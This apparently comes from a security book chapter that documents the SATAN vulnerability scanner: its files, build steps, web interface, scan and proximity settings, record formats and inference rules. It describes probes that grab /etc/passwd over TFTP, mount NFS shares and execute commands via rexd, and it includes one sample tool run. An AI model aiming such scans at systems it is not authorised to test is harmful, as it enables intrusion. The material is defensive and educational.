Examining the SATAN FilesA more detailed look at the files and directories included in the SATAN distribution providesan insight into how SATAN works and how it can be extended.

The satan-1.1.1 DirectoryThe top-level directory contains the following programs:

■ Makefile: Compiles the C programs in the src directory

■ satan: The master SATAN program, written in PERL

■ README: A one-page guide to getting SATAN running

■ TODO: Wish list for future enhancements

■ satan.8: A man page for the command-line version of SATAN

■ A drawing of the SATAN character

■ reconfig: Fixes pathnames using file.paths, PERL location

■ repent: Changes all occurrences of SATAN to SANTA

■ Changes: List of changes to SATAN program

Note that SATAN creates a satan-1.1.1/results directory to store the results. This directory isonly root searchable and readable.

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The include DirectoryThe include directory is created only for Linux. Some distributions of Linux require the44BSD /usr/include/netinet files to compile. SATAN creates the following two directories butdoes not put any files into them. If the top-level make for Linux is unable to find ip.h, itassumes that all the netinet files are missing and tells the user to put the netinet files from44BSD into the following directory:

■ include/netinet/

The rules DirectoryThe rules directory is critical to the functioning of SATAN. It includes the inference rules thatgovern the future actions of SATAN, based on previous results, as well as making assumptionsbased on information gathering. It includes the following files:

■ rules/facts: Deduces new facts based on existing data

■ rules/hosttype: Recognizes hosts based on banners

■ rules/services: Classifies host by available services

■ rules/todo: Specifies what rules to try next

■ rules/trust: Classifies trust based on the database records

■ rules/drop: Specifies which facts to ignore, such as NFS export cdroms

The config DirectorySATAN users need to customize the pathnames to system utilities in the appropriate files inthe config directory. In addition, the SATAN configuration file,, is located here. Thisconfiguration file controls the default behavior of SATAN, indicating the scan type, thecontent of each scan, the proximity search variables, and timeouts.

This directory includes the following files:

■ config/ Path variables for PERL files

■ config/ Path variables for shell execution

■ config/ SATAN configuration file

■ config/ SATAN version file

■ config/services: An /etc/services file, just in case

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The PERLlib DirectoryThe PERLlib directory includes two files from the PERL5.000 distribution that are sometimesnot included on all PERL5.000 FTP sites. Just in case, SATAN includes them in this direc-tory. It includes the following files:

■ PERLlib/ Includes time functions

■ PERLlib/ Gets command-line options

■ PERLlib/README: Explains why these PERL files are included

The bin DirectoryThe bin directory contains the actual executables used by SATAN to investigate remotesystems. After the top-level make is executed, all the binaries resulting from builds in the srcdirectory are deposited into this directory. All the distributed .satan files are PERL scripts, andmany of them invoke the binaries resulting from src/ builds. Each .satan executable generates aSATAN database record if it finds a piece of information about the remote host.

SATAN refers to each .satan program as a tool. Users can execute each of these PERL scriptsby hand to investigate the particular vulnerabilities. Many of them include verbose (-v) optionsto indicate exactly what they are doing. Users who wish to add extra security checks can createsimilar files and place them here with the .satan extension.

This directory includes the following files:

■ bin/boot.satan: Makes rpc bootparam call to get NIS domainname

■ bin/dns.satan: Uses nslookup to gather DNS records on target

■ bin/finger.satan: Gathers finger information from target

■ bin/ftp.satan: Checks for anonymous FTP and writeable home dir

■ bin/nfs-chk.satan: Tries to mount file systems

■ bin/rex.satan: Tries to execute program on rexd

■ bin/rpc.satan: Gets list from portmap using rpcinfo -p

■ bin/rsh.satan: Sees whether + + is in hosts.equiv

■ bin/rusers.satan: Gets rusersd to list users

■ bin/showmount.satan: Gets mountd to list exports, mounting users

■ bin/tcpscan.satan: Tries to connect to list of TCP ports

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■ bin/tftp.satan: Tries to get /etc/passwd file

■ bin/udpscan.satan: Looks for services on list of UDP ports

■ bin/xhost.satan: Sees if remote system permits X access

■ bin/ypbind.satan: Tries to guess the NIS domain name

■ bin/faux_fping: fping wrapper that skips unresolvable hosts

■ bin/get_targets: Uses fping to scan a subnet for live hosts

■ bin/yp-chk.satan: Asks NIS server for passwd map

The html DirectoryThe html directory contains the user interface of SATAN. The PERL scripts generate HTMLpages on-the-fly, whereas the many .html files contain detailed documentation on SATAN. Aregular user of SATAN would never actually examine any of these files by hand, because theinitial SATAN HTML page provides links into each of these pages. They look better whenviewed by a Web browser than by using a text editor. This directory includes the following files:

■ html/name.html. Explains the origin of the name “SATAN”

■ html/ Generates the opening SATAN Web page

■ html/ Generates the SATAN documentation Web page

The html/docs DirectoryThe html/docs directory contains valuable information on the internal workings of SATAN.The most useful are the satan.rules, satan.probes, satan.db, and trust pages. Once again, theinitial SATAN screen provides links to each of these HTML pages, so it is recommended thatthe Web browser be used to read them.

This directory includes the following files (no descriptions are included—the filenames areself-explanatory):

■ html/docs/acknowledgements.html

■ html/docs/satan_reference.html

■ html/docs/authors.html

■ html/docs/copyright.html

■ html/docs/design.html

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■ html/docs/quotes.html

■ html/docs/getting_started.html

■ html/docs/intro.html

■ html/docs/references.html

■ html/docs/system_requirements.html

■ html/docs/the_main_parts.html

■ html/docs/who_should_use.html

■ html/docs/

■ html/docs/artwork.html

■ html/docs/dangers.html

■ html/docs/FAQ.html

■ html/docs/philosophy.html

■ html/docs/satan.db.html

■ html/docs/satan.probes.html

■ html/docs/satan.rules.html

■ html/docs/user_interface.html

■ html/docs/trust.html

■ html/docs/admin_guide_to_cracking.html

■ html/docs/satan_overview.html

The html/dots DirectoryThe html/dots directory contains the colored GIF drawings that are used in the SATAN userinterface. (Again, the filenames are self-explanatory):

■ html/dots/blackdot.gif

■ html/dots/bluedot.gif

■ html/dots/browndot.gif

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■ html/dots/dot.gif

■ html/dots/eyeball.gif

■ html/dots/greendot.gif

■ html/dots/orangedot.gif

■ html/dots/orig.devil.gif

■ html/dots/pinkdot.gif

■ html/dots/purpledot.gif

■ html/dots/reddot.gif

■ html/dots/whitedot.gif

■ html/dots/yellowdot.gif

The html/images DirectoryThe html/images directory contains the GIF drawings displayed by SATAN. (The listings areself-explanatory, but notice that a GIF of Santa Clause is included to support the top-level“repent” command that changes all SATAN references to SANTA references, to soothe theconcerns of users who are offended by the SATAN name):

■ html/images/satan.gif

■ html/images/santa.gif

■ html/images/satan-almost-full.gif

■ html/images/satan-full.gif

The html/reporting DirectoryThe html/reporting directory contains PERL scripts that emit HTML pages that providesummary reports of the vulnerabilities found on targets listed in the SATAN database. Thereports can sort by many categories, as can be seen by the large number of scripts. Note theone-to-one corresponce between these filenames and the report screens found in the SATAN,the report “SATAN Information by Subnet” is generated by

■ html/reporting/ Displays the “SATAN Reporting and Analysis” Webpage

■ html/reporting/ Sorts hosts based on specified summary report criteria

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■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

■ html/reporting/

The html/running DirectoryThe html/running directory contains the two PERL scripts that begin and control the SATANscans:

■ html/running/ Runs in response to the selection of SATANTarget Selection from the SATAN Control Panel

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■ html/running/ Executes the SATAN scan and collects the datawhen the previous SATAN Run Form screen’s Start the scan field is selected

The html/tutorials DirectoryThe html/tutorials directory contains useful Web pages for understanding SATAN and thevulnerabilities that SATAN finds (the filenames are self-explanatory):

■ html/tutorials/

■ html/tutorials/first_time/analyzing.html

■ html/tutorials/first_time/learning_to_use.html

■ html/tutorials/first_time/make.html

■ html/tutorials/first_time/scanning.html

The html/tutorials/vulnerability DirectoryThe html/tutorials/vulnerability directory contains Web page tutorial help on each of thevulnerabilities searched for by SATAN, including links to appropriate resources that offer moreinformation:

■ html/tutorials/vulnerability/-NFS_export_to_unprivileged_programs.html

■ html/tutorials/vulnerability/-NFS_export_via_portmapper.html

■ html/tutorials/vulnerability/NIS_password_file_access.html

■ html/tutorials/vulnerability/REXD_access.html

■ html/tutorials/vulnerability/TFTP_file_access.html

■ html/tutorials/vulnerability/remote_shell_access.html

■ html/tutorials/vulnerability/unrestricted_NFS_export.html

■ html/tutorials/vulnerability/-unrestricted_X_server_access.html

■ html/tutorials/vulnerability/-writable_FTP_home_directory.html

■ html/tutorials/vulnerability/Sendmail_vulnerabilities.html

■ html/tutorials/vulnerability/FTP_vulnerabilities.html

■ html/tutorials/vulnerability/unrestricted_modem.html

■ html/tutorials/vulnerability/-SATAN_password_disclosure.html

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The html/admin DirectoryThe html/admin directory contains the PERL scripts that permit a user to dynamicallyconfigure the settings from the Web browser, without having to manually edit theconfig/ file. The files in this directory create the SATAN Configuration Managementscreen and execute configuration changes requested from that screen:

■ html/admin/ Displays the SATAN Configuration ManagementWeb page

■ html/admin/ Executes the changes indicated by the SATANConfiguration Management Web page, and displays the results of the status of thoserequested changes

The html/data DirectoryThe html/data directory contains the PERL scripts that a user invokes to examine or manipu-late existing SATAN databases. SATAN stores the results of scans into databases using astandard database record format. These text databases can be merged together or opened forthe generation of reports. The files in this directory create the SATAN Data Managementscreen and execute the actions requested from that screen:

■ html/data/ Displays the SATAN Data Management Web page

■ html/data/ Opens the requested SATAN database andmerges it with another.

■ html/data/ Opens the requested SATAN database

The src DirectoryThe src directory contains C source for several utility programs. These are written in C forincreased speed and compatibility. The top-level make will invoke makes in each of thesedirectories, which will deposit the executable in the bin directory.

The src/boot DirectoryThe boot program generates an rpc call to the target system requesting the BOOTPARAMservice to get the NIS domain name. As defined by the rules files, this program is invoked byboot.satan only if the remote portmap listing indicates the bootparam service:

■ src/boot/Makefile. Makes the boot program

■ src/boot/boot.c. Contains the boot client program

■ src/boot/bootparam_prot.x. rpcgen uses this .x file to generate the RPC stubs tosupport boot.c

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The src/misc DirectoryThe md5 program is used to generate a quasi-random 32-bit number that acts as a password.The server accepts only URL requests that include this value; this constitutes a sort ofmagic cookie security system. The rex program makes a simple request to the remote rexd toprove that access is possible. The rcmd program merely invokes the rcmd() call with theindicated parameters, namely the remote program to execute and the name of the remotesystem. The safe_finger program is a version of finger that prevents returning fingerd informa-tion from causing harm. Finally, the timeout program allows a user to run a command for alimited time.

This directory includes the following files:

■ src/misc/Makefile. Makes all the file in this directory

■ src/misc/global.h. Contains md5 header information

■ src/misc/md5.c. Generates the 32 bit hash value that is used by SATAN as a password

■ src/misc/md5.h. Contains include info for md5.c

■ src/misc/md5c.c. Contains support code for md5.c

■ src/misc/rex.c. Makes a simple request to rexd to prove that access is possible

■ src/misc/timeout.c. Executes a command-line specified program with the command-line specified timeout

■ src/misc/rex.x. Generates the RPC stub programs for rex.c

■ src/misc/sys_socket.c. Replaces PERL’s

■ src/misc/rcmd.c. Executes the rcmd() call with the indicated parameters (acts like rsh/remsh replacement)

■ src/misc/safe_finger.c. Protects the client system from dangers involved in runningfinger directly (a complete list of the precautions is included in the file)

The src/nfs-chk DirectoryThe src/nfs-chk directory contains the source for the nfs-chk binary, which attempts to mountan indicated file system from a particular server. This directory includes the following files:

■ src/nfs-chk/Makefile

■ src/nfs-chk/mount.x

■ src/nfs-chk/nfs-chk.c

■ src/nfs-chk/nfs_prot.x

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The src/port_scan DirectoryThe src/port_scan directory contains the source for the tcp_scan and udp_scan programs.These two programs scan an indicated target over an indicated range of ports by attempting toconnect to the ports on the target. This directory includes the following files:

■ src/port_scan/README

■ src/port_scan/error.c

■ src/port_scan/find_addr.c

■ src/port_scan/lib.h

■ src/port_scan/strerror.c

■ src/port_scan/mallocs.c

■ src/port_scan/non_blocking.c

■ src/port_scan/open_limit.c

■ src/port_scan/print_data.c

■ src/port_scan/ring.c

■ src/port_scan/tcp_scan.1

■ src/port_scan/tcp_scan.c

■ src/port_scan/udp_scan.c

■ src/port_scan/Makefile

The src/fping DirectoryThe src/fping directory contains the source for the fping program. This program is a replace-ment for the standard ping program and features the capability to more quickly scan a numberof remote hosts to determine whether these hosts are alive.

This directory includes the following files:

■ src/fping/README

■ src/fping/CHANGES

■ src/fping/fping.c

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■ src/fping/

■ src/fping/Makefile

■ src/fping/README.VMS

■ src/fping/AUTHOR

The src/rpcgen DirectoryThe src/rpcgen contains the source for the rpcgen program, a utility created by Sun that createsrpc stub files based on an .x file. The rpcgen utility is shipped on many systems, but SATANrequires it to run, so the creators of SATAN included the source, just in case. The rpcgenprogram is used to compile the nfs-chk, boot, rex, and yp-chk programs.

This directory includes the following files:

■ src/rpcgen/Makefile

■ src/rpcgen/rpc_clntout.c

■ src/rpcgen/rpc_cout.c

■ src/rpcgen/rpc_hout.c

■ src/rpcgen/rpc_main.c

■ src/rpcgen/rpc_parse.c

■ src/rpcgen/rpc_parse.h

■ src/rpcgen/rpc_scan.c

■ src/rpcgen/rpc_scan.h

■ src/rpcgen/rpc_svcout.c

■ src/rpcgen/rpc_util.c

■ src/rpcgen/rpc_util.h

■ src/rpcgen/README

The src/yp-chk DirectoryThe src/yp-chk directory contains the source for the NIS probe. The yp-chk program attemptsto see if an NIS map is available and prints the first record of that map if it is available.

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This directory includes the following files:

■ src/yp-chk/Makefile

■ src/yp-chk/yp.x

■ src/yp-chk/yp-chk.c

The perl DirectoryThe PERL directory contains the heart of the utilities that make up the SATAN program.Notice that the program acts as SATAN’s Web daemon, listening on a TCP port,authenticating HTML page requests, and responding with the appropriate HTML page.

This directory includes the following files:

■ perl/ Rewrites the file based on changes made through the Webinterface

■ perl/ Converts COPS warning report into SATAN rules (this isexperminental and not accessible from the Web interface)

■ perl/ Sifts information by domain names

■ perl/ Applies rules from drop file

■ perl/ Processes facts

■ perl/ Fixes truncated fully qualified domain names

■ perl/ Uses gethostbyaddr() or gethostbyname() to find the fully qualifieddomain name of a host

■ perl/ Uses nslookup to find the fully qualified domain name of a host

■ perl/ Finds own hostname

■ perl/ Classifies host by banner info

■ perl/ Acts as HTML server with md5 authentication (this is the SATAN Webdaemon)

■ perl/ Generates new facts based on rules

■ perl/ Generates list of new targets based on todo information

■ perl/ Contains utility subroutines

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■ perl/ Guides the selection of targets according to policies set in theconfiguration file

■ perl/ Replaces program names in SATAN with pathnames indicated infile.paths

■ perl/ Sets up list of targets, executes scans against targets, collects facts,processes todo information, and saves data

■ perl/ Includes data management routines

■ perl/ Classifies host by services used and provided

■ perl/ Classifies vulnerabilities

■ perl/ Runs a command and uses a timeout to ensure that it finishes

■ perl/ Executes sys_socket binary

■ perl/ Sifts subnet information

■ perl/ Checks if SATAN is running as root

■ perl/ Generates target lists, executes target probes, and saves scan information

■ perl/ Stores and processes information about hosts discovered while scanning atarget

■ perl/ Maintains trust statistics

■ perl/ Maintains time, date, and status file

Note PERL 5.000 (or later) is required to run SATAN. PERL 5.000 is available from anyFTP archive that mirrors the gnu distributions, including the following:

Building SATANEven though SATAN consists of a large number PERL, C, and HTML files, building SATANis quite straightforward and quick. Considering the flexibility of SATAN’s modular design, theease of use of SATAN’s user interface, and the powerful functionality, SATAN is extremelyeasy to build. (SATAN’s only possible weakness could be its speed—as a result of the largenumber of PERL scripts and modularity, SATAN is not as fast as a comparable monolithicbinary.)

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Note that building SATAN basically consists of modifying pathnames to correspond to yoursystem, and compiling the few binary utilities. The entire process takes only a few minutes.

Follow these steps to build SATAN:

1. Edit the and files in config/ to point to the actual location of utilities onyour system.

2. Edit the config/ file to correspond to your requirements. Specifically, you shouldconsider adding entries to $only_attack_these and $dont_attack_these. These twovariables provide control over what hosts are included in SATAN scans. For example, youmight want to run scans only against systems inside, so you would use the$only_attack_these variable to limit the scans to hosts inside the domain.

Note You can make modifications to from within SATAN using the SATANConfiguration Management screen.

3. Run the reconfig script. It patches scripts with the path for PERL 5.00x and a Webbrowser. If the Web browser selected by reconfig is inappropriate, edit the config/paths.plfile to point to the Web browser of choice. Notice that the variable for a Web browser iscalled $MOSAIC.

4. Run the make command in the satan-1.1.1/ directory. You need to specify a system type,such as irix5.

5. The authors of SATAN recommend that you unset proxy environment variables orbrowser proxy settings.

6. su or log in to root.

7. Run the satan script. If no command-line arguments are given, the script invokes a smallWeb (HTML) server,, and the Web browser to talk to this HTML server.

At this point, the primary SATAN screen is displayed and you are ready to use SATAN.

To use SATAN from the command line, you must list command-line arguments as indicatedby the satan.8 man page. Note that the authors recommend against using the command-lineversion of SATAN, because the user interface involves many command-line arguments that canbe somewhat confusing. The Web interface is much easier to use.

Using SATAN’s HTML InterfaceThe interactive version of SATAN consists of a sequence of HTML pages that are viewedthrough the Web browser. The general structure consists of a control panel that leads to fivedifferent functional areas: data management, target selection, reporting and analysis,

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configuration management, and documentation. Most screens give a link back to the SATANControl Panel.

The Control PanelThe SATAN Control Panel is your primary control menu for using SATAN (see fig. 8.1).There you find links to HTML pages that enable you to do the following:

■ Manage the data gathered by SATAN

■ Choose target systems and run scans

■ Generate reports and analyze data

■ Modify the default configuration for searches

■ Gain access to SATAN’s documentation and tutorials

Figure 8.1The SATAN ControlPanel.

In addition to the major options listed, a few links permit the user to FTP the latest version ofSATAN from a Dutch FTP archive, to change the name of the program to SANTA (if thename SATAN offends you), to find information about the artwork in the program, and to findinformation about the authors of the program.

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Data ManagementEach SATAN scan of a target system generates a series of database records that are stored ina database file. The default name of the database file is satan-data. For maintaining largeamounts of data, SATAN enables you to specify the name of the database file. If you choosethe SATAN Data Management option from the SATAN Control Panel, your Web browserdisplays the screen shown in figure 8.2. The screen shows you the names of the existingdatabases and enables you to do the following:

■ Open an existing database.

■ Create a new database.

■ Merge current data with an existing database.

Figure 8.2The SATAN Data

Management screen.

Notice that the URL in the Location field of figure 8.2 includes a TCP port number and a32-byte value. The port number corresponds to the port that the SATAN HTML daemon( is listening on, and the 32-byte value is the password that permits access. Thepassword is generated by an md5 hash function and should be unique to your system.

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Target SelectionWhen you are ready to run a SATAN scan, choose the SATAN Target Selection option on theSATAN Control Panel. By selecting that option, you are first presented with the screen shownin figure 8.3—the SATAN Target Selection screen. From here, you can specify the following:

■ The name of the system to scan (that is,

■ Whether SATAN should scan all hosts on the same subnet

■ The level of the scan (light, normal, or heavy)

Figure 8.3The SATAN TargetSelection screen.

After specifying this information, you can now initiate the scan. As the scan proceeds, you seethe name of each component scan program (mostly .satan scripts) being executed, along withparameters, on the SATAN Data Collection screen shown in figure 8.4. Note that eachcomponent scan program is invoked using the timeout program. This timeout program acts asa wrapper around the actual program, using the first argument as the maximum number ofseconds that the program is permitted to run before the timeout causes the program to execute.The signal that the timeout program sends, and the timeout values, can be configured usingthe file or the SATAN Configuration Management screen. Notice from figure 8.4 thatthe scan of this single host took about 38 seconds.

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After the scan completes, you can select the View Primary Target Results option from theSATAN Data Collection screen to get to the SATAN Results screen, shown in figure 8.5. TheSATAN Results screen provides a summary of information about the host, as well as a list ofvulnerability information. These results are based on the database records generated by the scan.

Reporting and Data AnalysisAfter running scans on several hosts, you might want to generate reports or analyze the datafrom multiple hosts. By choosing the SATAN Reporting & Data Analysis option from theSATAN Control Panel, you are presented with the screen shown in figure 8.6. From thisSATAN Reporting and Analysis screen, you can generate reports on all the scan results by thefollowing criteria:

■ Approximate danger level

■ Type of vulnerability

■ Vulnerability count

■ Class of service

■ System type

■ Internet domain

Figure 8.4The SATAN Data

Collection screen.

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Figure 8.5The SATAN Resultsscreen.

Figure 8.6The SATAN Reportingand Analysis screen.

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■ Subnet

■ Host name

You can also generate a list of trusted hosts and trusting hosts. By selecting the By Type ofVulnerability option on the SATAN Reporting and Analysis screen, you get the SATANVulnerabilities - By Type report shown in figure 8.7. This screen is very useful if you are tryingto eliminate security problems of a certain type. For example, if you thought that hackers wereactively attacking systems running rexd, this screen would be very useful in helping you todetermine the scope of the problem.

Figure 8.7The SATAN

Vulnerabilities - By Typereport.

Configuration ManagementBy choosing the SATAN Configuration Management option from the SATAN Control Panel,you can modify the configuration set in Using the screens shown in figures 8.8 and8.9, you can modify the following parameters:

■ The directory to keep the data in

■ The default probe level

■ The timeout value for each network probe

■ The kill signal sent to tool processes at timeout

■ The maximum proximity amount (maximal proximity)

■ The proximity descent value

■ Whether to stop when the probe level hits 0

■ Whether to scan the entire subnet of the target

■ Whether the intruder system is trusted

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■ Limits on what hosts to probe (by domain name or subnet address)

■ Limits on what hosts cannot be probed

■ Two workarounds: one tells SATAN to use nslookup (for NIS environments) orgethostbyname() lookups (for DNS environments), and one that tells SATAN to use ornot use ping (because ping depends on ICMP, environments where ICMP does notwork will want to avoid ICMP—not many systems fall into this category).

Figure 8.8The SATAN ConfigurationManagement screen, part 1.

Figure 8.9The SATAN ConfigurationManagement screen, part 2.

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The proximity settings deserve comment. SATAN treats any host information gained from ascan of a single target system as having a proximity of 1 to the target system. This means thatthe name servers, MX mail hosts that receive mail for this system, NFS clients, and hosts listedin the .rhosts/hosts.equiv files are all considered to have a proximity of 1 to the target. If youscan with a maximal proximity setting of 2, the number of hosts scanned can become quitelarge. SATAN scans the target, then scans all hosts that have a proximity of 1 to the target, andthen scans all hosts that have a proximity of 1 to the hosts that have a proximity of 1 to thetarget. You can imagine the exponential growth involved with SATAN scans that use amaximal proximity setting greater than 2. When the maximal proximity field is set to 0,SATAN scans only the target system, and possibly the target’s subnet.

The proximity descent field can be used to decrease the intensity of the scan as SATAN movesthe scan out to less proximate hosts. For example, consider a situation where the maximalproximity field is set to 2, the proximity descent field is set to 1, and the probe level starts atheavy. The target is scanned at the heavy level, the hosts at proximity of 1 are scanned at thenormal level, and the hosts at proximity of 2 are scanned at the light level.

If you specify a subnet expansion, SATAN scans every host with an IP address whose first threeparts match the target. For example, if the target was, SATAN would scan everyhost in the IP range to (Note that x.x.x.0 and x.x.x.255 aretypically reserved for broadcast and are not assigned to individual hosts.)

DocumentationSelecting the SATAN Documentation option from the SATAN Control Panel brings up anindex into SATAN’s extensive online documentation, as shown in figure 8.10. Detailedinformation on SATAN and network vulnerabilities is available.

Figure 8.10The SATAN

Documentation index.

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The following are the three most useful parts of the documentation:

■ SATAN Reference

■ Vulnerabilities Tutorials

■ Admin Guide to Cracking

The SATAN Reference provides detailed information about SATAN, the database records, andthe inference engine. SATAN includes tutorials on the 13 network vulnerabilities included inits scans. If you choose the “Vulnerabilities - a Tutorial” option from the SATAN Documenta-tion screen, SATAN brings up the list of these tutorials, as shown in figure 8.11.

Figure 8.11The SATAN TutorialsSecurity problems

Choosing an entry from the Vulnerabilities screen brings up a tutorial that includes tips onaddressing the problem and Web links to programs and information regarding the problem.For example, if you choose the Remote Shell Access option from the Vulnerabilities screen,SATAN brings up the Remote Shell Access screen shown in figure 8.12.

Note that many of the tutorial screens, such as the one shown in figure 8.12, provide a link tothe seminal paper “Improving the Security of Your Site by Breaking Into It” (Farmer &Venema, 1993). This influential document was written by the authors of SATAN and led tothe creation of SATAN. The entire goal of SATAN was to automate the process described inthe paper. If you select the Admin Guide to Cracking option from the Remote Shell Accessscreen, SATAN brings up the paper, as shown in figure 8.13.

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Running a ScanFollow these steps to run a scan:

1. Start your SATAN scan from the SATAN Control Panel screen, as shown in figure 8.1.

Figure 8.12The Remote Shell Access


Figure 8.13SATAN’s Admin Guide to


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2. Select the SATAN Configuration Management option and modify the settings asdiscussed previously.

For a scan of a single target system, just make sure that the maximal proximity is set to 0and that subnet expansion is turned off.

3. Return to the SATAN Control Panel by selecting the Change the Configuration Fileoption to save any changes.

4. Choose the SATAN Target Selection option and type the name of the target system intothe field on the SATAN Target Selection screen.

5. Select the scan level and start the scan.

6. After the SATAN data collection is complete, select the View Primary Target Resultsoption from the SATAN Data Collection screen.

You have now completed the SATAN scan. If you are running a scan against a subnet, youhave a maximal proximity setting greater than 1, or you have scanned several hosts, yourdatabase information might grow large. To generate reports that help you sort this data, choosethe SATAN Reporting & Data Analysis option from the SATAN Control Panel. From theSATAN Reporting and Analysis screen, you can select reports that help to sort the informationon all the database records.

Understanding the SATAN Database Record FormatThere are three types of database records: facts, all-hosts, and todo. These database recordsare stored in three different files: facts, all-hosts, and todo. These files are typically in asubdirectory of satan called results/satan-data. The subdirectory of results corresponds to thename of the SATAN database, with the default being satan-data.

The facts file contains the results of vulnerability scans; each record of this file is called a fact.SATAN attempts to build a database of host information in the all-hosts file, which containshost name information, regardless of whether SATAN scanned those hosts. The todo file keepstrack of which probes have been run against a target.

Looking at the FactsEach .satan script (program) is required to output text records that are directly stored into thefacts database file. Each text record consists of eight fields, each separated by a pipe (|) charac-ter. Newlines separate entries in this file. Each SATAN fact starts with a $target field and endswith a $text field. The rulesets use PERL search capabilities to match against records from thefacts file. SATAN rulesets are described in detail later in this chapter in a section called“Understanding the SATAN Rulesets.”

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Each SATAN fact consist of the following eight fields:

■ Target

■ Service

■ Status

■ Severity

■ Trusted

■ Trustee

■ Canonical service output

■ Text

Target ($target)This is the name of the host that the record refers to. SATAN tries to put the fully qualifieddomain name into this field, but if it cannot, it uses the IP address. If that fails, it uses anestimated name or partial name.

Service ($service)This is the name of the tool with the .satan suffix removed. If a tool does more than one scan,such as rpc.satan, this is the name of the service probed.

Status ($status)This is a one-character field that indicates the status of the target host, as follows:

Field Description

a Indicates that the target was available

u Indicates that it was unavailable

b Indicates that the target name could not be resolved to an IP address andwas therefore a bad name

x Is used for other cases (reserved for future use)

Severity ($severity)This is a two-character field that indicates the estimated severity of the vulnerability:

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Field Description

rs Indicates that the vulnerability could lead to root access on the target system

us Indicates that a user shell could be invoked

ns Indicates that a shell owned by the nobody (uid = 2) user could be invoked

uw Indicates that the vulnerability could lead to the writing of a file as a non-root user

nr Indicates that the vulnerability could lead to a file read as the nobody user

The SATAN documentation does not mention three other listings that are used: x, l, and nw.The l severity corresponds to login information gathered from rusers.satan and finger.satan.The x entry indicates an unknown severity, but with potential for access. The nw indicates thatthe nobody user can write files.

The ns entry corresponds to ITL class 6; the nr entry corresponds to ITL class 4; and theothers (except x and l) correspond to ITL class 5. (Note that permissions corresponding to thenobody user directly relate to world access settings on files.) SATAN breaks down the ITL class5 group into three parts: the ability to execute a program as any non-root user; the ability toexecute a program as the nobody user; and the ability to write files as any non-root user.

In general, if a hacker can modify any non-root user file, the hacker can modify executablesthat the user will run, resulting in the ability of the hacker to gain execution access. Thenobody user concept is quite closely linked with the holes of NFS only.

Trusted ($trusted)This field consists of two tokens separated by an @—the left part being a user and the rightpart being a host. (If no @ is included, the entire field is interpreted as the user part.) Itrepresents an account or directory that trusts another target. The user part of that account isselected from these four choices: user, root, nobody, or ANY. The host part can be either thetarget system or ANY, but only the target system makes sense for the Trusted field. The$trusted account trusts users as specified by the $trustee field.

Trustee ($trustee)This field represents those users and systems that are trusted by the accounts listed in the$trusted field. It uses the same format as the $trusted field.

Canonical Service Output ($canonical)For non-vulnerability records, this contains a formatted version of the information, either username, home dir, last login or filesys, clients. For vulnerability records, this contains a descrip-tion of the problem type.

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Text ($text)This contains messages used for reports. For example, for a TCP scan, this field contains offers<service>, where <service> corresponds to a service name from the /etc/services file, such asshell.

Sample Fact RecordHere is an example of the output of the rpc.satan scan that consists of records in the factdatabase record format:

% bin/ftp.satan m2.notreal.comm2|ftp|a|x|||ANONYMOUS|offers anon ftpm2|ftp|a|nw|˜ftp|ANY@ANY|writable FTP home directory|˜ftp is writable%

Both facts have a $target of m2, a $service of ftp, and indicate a $status of a (available). The$severity field for the first record is x, indicating an informational record with unknownseverity, whereas the second record shows nw to indicate that anyone (even the nobody user)can write a file using this vulnerability. The $trusted and $trustee fields do not apply to thefirst record, but the second record indicates that the ˜ftp directory ($trusted) grants access toanyone on any other system ($trustee = ANY@ANY). The canonical service output for the firstrecord indicates that the problem is ANONYMOUS access to FTP, whereas the second recordindicates the problem is a “writable FTP home directory.” Finally, the $text fields for bothrecords describe the problem for reporting purposes.

Note The pathnames of most of the .satan tools assume that they are being run with adefault directory of the top-level SATAN program, satan-1.1.1. For example,rpc.satan tries to include config/, where config is a subdirectory of satan-1.1.1. Either run these tools from that directory, as shown in the example, or modifythese tools to include absolute pathnames.

Another way to understand the facts database is to look at the actual satan-1.1.1/results/satan-data/facts file after running a few heavy scans. This file will be filled with records generated bythe .satan tools.

Seeing All the HostsThe all-hosts text file contains host records, which are used to keep track of hosts that SATANhas seen, regardless of whether these hosts have been scanned by SATAN. Each host recordconsists of six fields, each separated by a pipe (|) character. Newlines separate entries in thisfile.

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Each SATAN host record consists of the following six fields:

■ The name of the host

■ The IP address of the host

■ The proximity level from the original target

■ The level to which this host has been scanned (-1 for hosts that have not been scanned)

■ Whether this host was encountered during subnet expansion (0 for no, 1 for yes)

■ The time this host was scanned (in time() format) (optional)

By looking at the satan-1.1.1/results/satan-data/all-hosts file, the structure of these records canbe seen:||0|2|0|||1|-1|0|

Notice that has not been scanned (-1) and therefore has no time entry.

Examining All the Things It DidThe SATAN todo file contains a list of hosts, and probes that have been run against thosehosts. Each todo record consists of three fields, separated by a pipe (|) character. The fields areas follows:

■ The hostname

■ The name of the tool that was run against that host

■ Any arguments used by that tool during the run against that host

The best way to understand this database format is to look at the satan-1.1.1/results/satan-data/todo file:|tcpscan.satan|0,80,ftp,telnet,smtp,nntp,uucp,6000||dns.satan||rpc.satan||xhost.satan|-d

Notice that the system had tcpscan.satan scan the system for the listed TCPports, then a dns scan, an rpc scan, and finally, an xhost test.

Understanding the SATAN RulesetsWhen making a scan, SATAN first examines vulnerabilities that are explicitly listed in the scanlevel of the file. The scan level can indicate optional checks for a vulnerability by

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listing it with a ?. This means that SATAN will check the rulesets to see whether this specificvulnerability scan should be done, based on information that has already been gathered.

For example, the light scan includes showmount.satan? after the rpc.satan entry. This meansthat the showmount.satan script is run only if the mount service is available on the targetsystem, and this information is available as a result of the rpc.satan output. This conditionalexecution can speed up the execution of SATAN by avoiding unnecessary tests.

Six files in the rules directory constitute the rulesets for SATAN: drop, facts, hosttype, services,todo, and trust.

dropThe drop file is used to determine which facts should be ignored. It currently ships with only asingle rule: ignore NFS-exported /cdrom directories. Note that cdrom directories that areNFS-exported but are not named /cdrom are not dropped from the facts database.

The entries in this file use PERL condition matching against each a SATAN fact. The singlerule included in the drop file is

$text =˜ /exports \/cdrom/i

This rule says that the record should be dropped if the $text field contains exports /cdrom,because that is the field between the //. Note that the i at the end indicates that the searchshould be case-insensitive.

factsThe facts file deduces new facts based on existing data. Each entry consists of a condition,which is another PERL search condition that is applied against SATAN facts and a fact that isadded to the facts file if that condition evaluates to true.

An example clarifies this structure:

/runs rexd/ $target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is➥vulnerable

